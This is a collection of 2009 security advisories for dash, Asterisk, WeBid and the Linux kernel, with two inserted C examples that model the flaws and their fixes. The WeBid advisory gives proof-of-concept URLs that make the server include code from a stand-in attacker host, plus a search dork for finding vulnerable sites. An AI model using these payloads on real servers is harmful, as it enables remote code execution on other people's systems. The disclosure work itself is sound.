===========================================================
Ubuntu Security Notice USN-732-1 March 10, 2009
dash vulnerability
CVE-2009-0854
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.04 LTS:
dash 0.5.4-8ubuntu1.1
Ubuntu 8.10:
dash 0.5.4-9ubuntu1.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Wolfgang M. Reimer discovered that dash, when invoked as a login shell, would
source .profile files from the current directory. Local users may be able to
bypass security restrictions and gain root privileges by placing specially
crafted .profile files where they might get sourced by other dash users.
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.diff.gz
Size/MD5: 171656 5f74e0a922546193a9e6279ad8680c76
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.dsc
Size/MD5: 697 e78236937fea17c0c7a43427321b1ce6
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
Size/MD5: 212145 bc457e490a589d2f87f2333616b67931
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-8ubuntu1.1_all.deb
Size/MD5: 22068 82557822348627c1b240069e431886e2
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_amd64.deb
Size/MD5: 96918 b8d43124e5353042c7fd93fcc5c19cc9
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_i386.deb
Size/MD5: 87952 6bc4578aea92450f8e00625fd7a7755a
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_lpia.deb
Size/MD5: 88194 a90de1a5dedb9cbaeb65537e8e933356
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_powerpc.deb
Size/MD5: 97400 5e2187820648d980b4edaa4e4a71b6c5
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_sparc.deb
Size/MD5: 91072 dc5e22376445e185eacdaa049421c866
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.diff.gz
Size/MD5: 129759 b5363e9ff9550e89dec4be8ddc408607
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.dsc
Size/MD5: 1083 dc87a11f64c53960ffb1f55dc42a253f
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
Size/MD5: 212145 bc457e490a589d2f87f2333616b67931
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-9ubuntu1.1_all.deb
Size/MD5: 22286 9a34d34a67d46b8fa42584a2a7d61f76
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_amd64.deb
Size/MD5: 99406 8703819fce4bc25f65caa350de05763c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_i386.deb
Size/MD5: 90266 9d8931f5ef08f4d649127db0ab644f8e
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_lpia.deb
Size/MD5: 90322 a0db897e7a7c5a7706d71674bad025ee
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_powerpc.deb
Size/MD5: 99500 a583f4a7fc59a7495cb3615c4af54b05
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_sparc.deb
Size/MD5: 93030 1bd3a8c0907e56cb2ed17c572e61842b
From: "Asterisk Security Team" <security@asterisk.org>
Subject: AST-2009-002: Remote Crash Vulnerability in SIP channel driver
Date: Tue, 10 Mar 2009 12:38:37 -0500
Asterisk Project Security Advisory - AST-2009-002
+------------------------------------------------------------------------+
| Product | Asterisk |
|---------------------+--------------------------------------------------|
| Summary | Remote Crash Vulnerability in SIP channel driver |
|---------------------+--------------------------------------------------|
| Nature of Advisory | Denial of Service |
|---------------------+--------------------------------------------------|
| Susceptibility | Remote Authenticated Sessions |
|---------------------+--------------------------------------------------|
| Severity | Moderate |
|---------------------+--------------------------------------------------|
| Exploits Known | No |
|---------------------+--------------------------------------------------|
| Reported On | February 6, 2009 |
|---------------------+--------------------------------------------------|
| Reported By | bugs.digium.com user klaus3000 |
|---------------------+--------------------------------------------------|
| Posted On | March 10, 2009 |
|---------------------+--------------------------------------------------|
| Last Updated On | March 10, 2009 |
|---------------------+--------------------------------------------------|
| Advisory Contact | Joshua Colp <jcolp@digium.com> |
|---------------------+--------------------------------------------------|
| CVE Name | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Description | When configured with pedantic=yes the SIP channel driver |
| | performs extra request URI checking on an INVITE |
| | received as a result of a SIP spiral. As part of this |
| | extra checking the headers from the outgoing SIP INVITE |
| | sent and the received SIP INVITE are compared. The code |
| | incorrectly assumes that the string for each header |
| | passed in will be non-NULL in all cases. This is |
| | incorrect because if no headers are present the value |
| | passed in will be NULL. |
| | |
| | The values passed into the code are now checked to be |
| | non-NULL before being compared. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | Upgrade to revision 174082 of the 1.4 branch, 174085 of |
| | the 1.6.0 branch, 174086 of the 1.6.1 branch, or one of |
| | the releases noted below. |
| | |
| | The pedantic option in the SIP channel driver can also be |
| | turned off to prevent this issue from occurring. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.2.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.4.x | Versions 1.4.22, 1.4.23, |
| | | 1.4.23.1 |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.6.0.x | All versions prior to 1.6.0.6 |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.6.1.x | All versions prior to |
| | | 1.6.1.0-rc2 |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.2.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.4.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.6.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | A.x.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | B.x.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | C.x.x | Only version C.2.3 |
|----------------------------+---------+---------------------------------|
| s800i (Asterisk Appliance) | 1.2.x | Not affected |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.4.23.2 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.6.0.6 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.6.1.0-rc2 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | C.2.3.2 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Patches |
|------------------------------------------------------------------------|
| URL |Branch|
|-----------------------------------------------------------------+------|
| http://downloads.digium.com/pub/security/AST-2009-002-1.4.diff |1.4 |
|-----------------------------------------------------------------+------|
| http://downloads.digium.com/pub/security/AST-2009-002-1.6.0.diff |1.6.0 |
|-----------------------------------------------------------------+------|
| http://downloads.digium.com/pub/security/AST-2009-002-1.6.1.diff |1.6.1 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | http://bugs.digium.com/view.php?id417 |
| | |
| | http://bugs.digium.com/view.php?id547 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://downloads.digium.com/pub/security/AST-2009-002.pdf and |
| http://downloads.digium.com/pub/security/AST-2009-002.html |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|------------------+--------------------+--------------------------------|
| 2009-03-10 | Joshua Colp | Initial release |
+------------------------------------------------------------------------+
Asterisk Project Security Advisory - AST-2009-002
Copyright (c) 2009 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
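
The NULL-handling flaw described in AST-2009-002, shown as an added example that is not part of the advisory and is not Asterisk source code: an order-independent comparison of URI header strings, first in a form that assumes both inputs are non-NULL, then wrapped in the check the advisory describes. All function names are hypothetical, and treating "absent" against "present" as a mismatch is an assumption of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_HDRS 16
#define BUF_LEN  256

struct hdr { const char *name; const char *value; };

/* Case-insensitive equality for header names. */
static int name_eq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == *b;
}

/* Split "n1=v1&n2=v2" in place; returns the pair count, or -1 if too many. */
static int split_headers(char *buf, struct hdr out[])
{
    int n = 0;
    while (buf && *buf) {
        char *next = strchr(buf, '&');
        if (next)
            *next++ = '\0';
        if (n == MAX_HDRS)
            return -1;
        char *eq = strchr(buf, '=');
        if (eq)
            *eq++ = '\0';
        out[n].name = buf;
        out[n].value = eq ? eq : "";
        n++;
        buf = next;
    }
    return n;
}

/* "Before": assumes h1 and h2 are non-NULL. With no headers present the
 * caller passes NULL, and strlen(NULL) below is the crash.
 * Returns 0 on match, 1 on mismatch. */
static int headers_cmp_unchecked(const char *h1, const char *h2)
{
    char b1[BUF_LEN], b2[BUF_LEN];
    struct hdr l1[MAX_HDRS], l2[MAX_HDRS];
    int used[MAX_HDRS] = {0};

    if (strlen(h1) >= BUF_LEN || strlen(h2) >= BUF_LEN)
        return 1;
    strcpy(b1, h1);
    strcpy(b2, h2);
    int n1 = split_headers(b1, l1);
    int n2 = split_headers(b2, l2);
    if (n1 < 0 || n2 < 0 || n1 != n2)
        return 1;
    for (int i = 0; i < n1; i++) {
        int found = 0;
        for (int j = 0; j < n2 && !found; j++) {
            /* each header on the right may satisfy only one on the left */
            if (!used[j] && name_eq(l1[i].name, l2[j].name) &&
                strcmp(l1[i].value, l2[j].value) == 0)
                used[j] = found = 1;
        }
        if (!found)
            return 1;
    }
    return 0;
}

/* "After": values are checked to be non-NULL (and non-empty) before use. */
int headers_cmp(const char *h1, const char *h2)
{
    int none1 = (h1 == NULL || *h1 == '\0');
    int none2 = (h2 == NULL || *h2 == '\0');

    if (none1 && none2)
        return 0;               /* neither side carries headers */
    if (none1 || none2)
        return 1;               /* headers on one side only */
    return headers_cmp_unchecked(h1, h2);
}

int main(void)
{
    /* Constructed inputs. */
    printf("NULL vs NULL        -> %d\n", headers_cmp(NULL, NULL));
    printf("NULL vs Subject=hi  -> %d\n", headers_cmp(NULL, "Subject=hi"));
    printf("a=1&b=2 vs B=2&A=1  -> %d\n", headers_cmp("a=1&b=2", "B=2&A=1"));
    return 0;
}
```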
Date: Tue, 10 Mar 2009 12:10:49 -0600
From: vuln@e-rdc.org
Subject: [ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
ECHO_ADV_104$2009
-----------------------------------------------------------------------------------------
[ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------
Author : K-159
Date : March 11th, 2009
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore7
Critical Lvl : High
Impact : System Access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : WeBid
Version : <= 0.7.3 RC9
Vendor : http://sourceforge.net/projects/simpleauction
         http://www.webidsupport.com/
Description :
WeBid is an open source, fully featured PHP/MySQL auction script. Perfect for those who want to start their own auction site.
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Input passed to the "$include_path" parameter in the cron.php page is not properly verified before being used
to include files. This can be exploited to include arbitrary files from local or external resources.
This vulnerability also affects the files ST_browsers.php, ST_countries.php and ST_platforms.php in the admin folder.
Successful exploitation requires that "register_globals" is enabled.
PoC/Exploit:
~~~~~~~~~
http://www.example.com/[path]/cron.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_browsers.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_platforms.php?include_path=http://www.attacker.com/evil?
Dork:
~~~~~
Google : "copyright 2008, WEBID"
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn off register_globals.
Timeline:
~~~~~~~~~
- 08 - 03 - 2009 bug found
- 08 - 03 - 2009 vendor contacted
- 08 - 03 - 2009 vendor response
- 11 - 03 - 2009 advisory release
---------------------------------------------------------------------------
Contact:
~~~~~~
K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage:
http://www.e-rdc.org/
-------------------------------- [ EOF ] ----------------------------------
From: security@mandriva.com
Subject: [ MDVSA-2009:071 ] kernel
Date: Tue, 10 Mar 2009 20:03:01 +0100
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:071
http://www.mandriva.com/security/
_______________________________________________________________________
Package : kernel
Date : March 10, 2009
Affected: 2009.0
_______________________________________________________________________
Problem Description:
Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:
The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux
kernel before 2.6.28.6 permits SKFP_CLR_STATS requests only when the
CAP_NET_ADMIN capability is absent, instead of when this capability
is present, which allows local users to reset the driver statistics,
related to an inverted logic issue. (CVE-2009-0675)
The sock_getsockopt function in net/core/sock.c in the Linux kernel
before 2.6.28.6 does not initialize a certain structure member, which
allows local users to obtain potentially sensitive information from
kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)
Additionally, this update provides stable 1.0.18 ALSA updates/fixes,
STAC92HD71Bx/STAC92HD75Bx hda-intel support changes/fixes
(affects sound chip codecs used on several HP dv laptop series),
fixes/enhancements for HP Educ.ar machine HDA sound support, minor
alsa hda-intel code cleanup for ALC888 6stack-dell model, to stop
printing unneeded output to kernel log, and a few more things. Check
the package changelog for details.
To update your kernel, please follow the directions located at:
http://www.mandriva.com/en/security/kernelupdate
_______________________________________________________________________
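
The two kernel flaws described above (CVE-2009-0675 and CVE-2009-0676), modelled in user space as an added example that is not kernel source and not part of the advisory. All names and option numbers are hypothetical; `has_net_admin` stands in for the kernel's capability test, and the poison byte simulates stale stack contents so the leak is deterministic.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* ---- CVE-2009-0675 model: inverted capability test ------------------- */
struct drv_stats { unsigned long rx_frames, tx_frames; };

/* Vulnerable shape: the reset runs only when the capability is ABSENT. */
int clr_stats_inverted(struct drv_stats *s, int has_net_admin)
{
    if (!has_net_admin) {
        memset(s, 0, sizeof(*s));
        return 0;
    }
    return -EPERM;
}

/* Corrected shape: refuse first, then perform the privileged action. */
int clr_stats_fixed(struct drv_stats *s, int has_net_admin)
{
    if (!has_net_admin)
        return -EPERM;
    memset(s, 0, sizeof(*s));
    return 0;
}

/* ---- CVE-2009-0676 model: uninitialised member copied to the caller -- */
enum { OPT_DEBUG = 1, OPT_BSDCOMPAT = 2 };  /* constructed option numbers */
#define STALE_BYTE 0x5A                     /* constructed "old stack data" */

static int getopt_model(int opt, int init_first, int *user_out)
{
    union { int val; long pair[2]; } v;

    memset(&v, STALE_BYTE, sizeof(v));      /* simulate leftover stack bytes */
    if (init_first)
        memset(&v, 0, sizeof(v));           /* the fix: initialise up front */

    switch (opt) {
    case OPT_DEBUG:
        v.val = 1;                          /* normal option: value is set */
        break;
    case OPT_BSDCOMPAT:
        break;                              /* obsolete option: v untouched */
    default:
        return -ENOPROTOOPT;
    }
    /* Stands in for copying the result back to user space. */
    memcpy(user_out, &v, sizeof(*user_out));
    return 0;
}

int getopt_vulnerable(int opt, int *out) { return getopt_model(opt, 0, out); }
int getopt_fixed(int opt, int *out)      { return getopt_model(opt, 1, out); }

int main(void)
{
    struct drv_stats s = { 10, 20 };
    int out = 0;

    printf("inverted check, no capability: rc=%d rx=%lu\n",
           clr_stats_inverted(&s, 0), s.rx_frames);
    s.rx_frames = 10;
    printf("fixed check,    no capability: rc=%d rx=%lu\n",
           clr_stats_fixed(&s, 0), s.rx_frames);

    getopt_vulnerable(OPT_BSDCOMPAT, &out);
    printf("vulnerable BSDCOMPAT read: 0x%08x\n", (unsigned)out);
    getopt_fixed(OPT_BSDCOMPAT, &out);
    printf("fixed BSDCOMPAT read:      0x%08x\n", (unsigned)out);
    return 0;
}
```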
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
4c27d98640d507934d58fa491575daa8 2009.0/i586/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
2696288a3309bfae68cbb5b9ee9363e0 2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
3c1d28fb5632251983cacaec44578d86 2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
6cf33c3312fd3256dcb14761921eb4ab 2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
eacb8ea778af3ff78ef58942eab23105 2009.0/i586/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
107264ee670882f9642532d05029e229 2009.0/i586/omfs-kernel-2.6.27.19-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
b926add1895fbcda6ba32323f8e88718 2009.0/i586/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
9fbd459e57d8eeeafada18852830058a 2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
325424f7a578647dfea9897dd4dccd40 2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
8da55e50cb708523e212ce2ede9182c4 2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
7b60f82b26ca77ca995c19db818135cc 2009.0/i586/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
5dead3be02cc6baf52f020b97c232a75 2009.0/i586/omnibook-kernel-2.6.27.19-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
8c097aac6047b51e87889e579f9b891f 2009.0/i586/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
48b63f06c6142efd0843d9477b60a033 2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
6529176b08f4dfd65fc94cc32367c54c 2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
862f88d7d82bef088613231baf0bf113 2009.0/i586/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
2b78f1db33766589890f955b3c3e8d90 2009.0/i586/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
d6eb3627145b554742753487a699eb71 2009.0/i586/opencbm-kernel-2.6.27.19-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
5fef6dba8d3e420e11ca46b89299eb96 2009.0/i586/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
eb2cf46481c7d3c5c506dd48f73d13a3 2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
802accbcaf5dbfa054624a825462f4c3 2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
e8511deddd2814268b87b11e569cb1af 2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
9f2b095f9ea7fba33c9a92449eceae81 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.i586.rpm
f1ddfb49495fd5829ecf762a4592ee06 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop586-1mnb-1.5.9-2mdv2009.0.i586.rpm
c31a76dc6c4720037d7f0a92e1e157aa 2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.i586.rpm
f24ee14c676a1cd20eea56db6ff9cea7 2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
10f4aa4428b68e71a8bd4d5555f78454 2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
f6c26ba890714e3a9ded62420e130c5a 2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
0f67c9befc9efd569cbdd2ccbfd85d93 2009.0/i586/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
a81c832fddc48d688213bc82cd9380df 2009.0/i586/qc-usb-kernel-2.6.27.19-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
c8b8bbb68fdfb8d62a4f959337b69060 2009.0/i586/qc-usb-kernel-2.6.27.19-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
b1dd4c309c852d61432f608684417174 2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
45f7b32bc8ca152e3591b370453903f9 2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
63ab7b8e15acfafec986fc3329fd4ace 2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20090305.6mdv2009.0.i586.rpm
8857d93572e771cf61f74b3e7314847f 2009.0/i586/rt2860-kernel-2.6.27.19-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
dc1b1f29dcc9c4dbe9fd6eb7784f18e1 2009.0/i586/rt2860-kernel-2.6.27.19-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
31ab07fe76c636721d98650788c6636a 2009.0/i586/rt2860-kernel-2.6.27.19-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
4cdf540e3c9fb2001e369cc6353c56e6 2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
ebc20fa97dcb178adcc7a6da546c0f63 2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
ff9ea4777a7d4052ad2da48d71538220 2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20090305.2mdv2009.0.i586.rpm
9734b47a2dec3510e7851d972da5ee88 2009.0/i586/rt2870-kernel-2.6.27.19-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
e588805d6198a9c1eac96d09b317fd2b 2009.0/i586/rt2870-kernel-2.6.27.19-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
167cddba9d97c655184c7d79b9383ca4 2009.0/i586/rt2870-kernel-2.6.27.19-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
f5bfe516a51433cfaab9d766ae209430 2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
a7785d9be7e07cc9e5d2f4445bffd822 2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
a962d5a5ddb0d5abfbe1fe3e57fb48b1 2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20090305.2mdv2009.0.i586.rpm
b1a877d9e8d00b70b59bb80c9680acbe 2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
c048e5315987f26780616cf94c0f4822 2009.0/i586/rtl8187se-kernel-2.6.27.19-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
f6eff0adb94357152e3a0852d5379ad3 2009.0/i586/rtl8187se-kernel-2.6.27.19-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
a32f1a756d4de813795e599e97d1c2d0 2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
2ff2126b46e5f25885d405fa5127111e 2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
9662cf974be2c1a44c37b6190f3dc5fa 2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20090305.1.1mdv2009.0.i586.rpm
f23c60919bb5868d827154d0d124b24b 2009.0/i586/slmodem-kernel-2.6.27.19-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
f174511adbf4e7d4a28fa93d8bf445df 2009.0/i586/slmodem-kernel-2.6.27.19-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
98e226637b496a13a5cc61aa1c32825e 2009.0/i586/slmodem-kernel-2.6.27.19-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
2453d695bf412200f05105d19c83295d 2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
81ba97857beb20d566b38b4eb70395f3 2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
fde7a43ea7bec1b5bd0ed4ee2d44649a 2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20090305.0.20080817.1mdv2009.0.i586.rpm
052bec59e98e44029488c57b69fe60ff 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
4c1fa95cc898ba83f6baf0d620edd03b 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
c2fb9bcc23ff1f6f5cc80f141bfcc5b5 2009.0/i586/squashfs-lzma-kernel-2.6.27.19-server-1mnb-3.3-5mdv2009.0.i586.rpm
ffaee2e16f52219fd01aeac53a7b9a28 2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
875ef4776e87aacc60311cd6348c8e70 2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
7be80c25c340e40ab5806cbb7e2b1c1b 2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20090305.5mdv2009.0.i586.rpm
67d811b775b455cca7646ab96fe19feb 2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
dc86190987f5d63dee6a09f6b575cc03 2009.0/i586/tp_smapi-kernel-2.6.27.19-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
b5541df9b49246ab3a543954776b0c45 2009.0/i586/tp_smapi-kernel-2.6.27.19-server-1mnb-0.37-2mdv2009.0.i586.rpm
08c55424da589b16df3d121444567561 2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
42b2b4fcb45a531cf9ac98415df13a75 2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
25cc601d14b45a48684a637293bce938 2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20090305.2mdv2009.0.i586.rpm
17fef41a38010861a901930cf4ed8789 2009.0/i586/vboxadd-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
5b4a7708d4886312877f1221ff8b8e6a 2009.0/i586/vboxadd-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
fbb5b5ffd33de16d821f38f860aeaee3 2009.0/i586/vboxadd-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
a74d862b1eab86f4e91750b6a6d17d36 2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
05cb9e7b2412e33b527a9d8349801d39 2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
b0b7f400718e23692fad06655ead2d5b 2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
5f4036eea31ec44aee2c39ce9fd1e019 2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
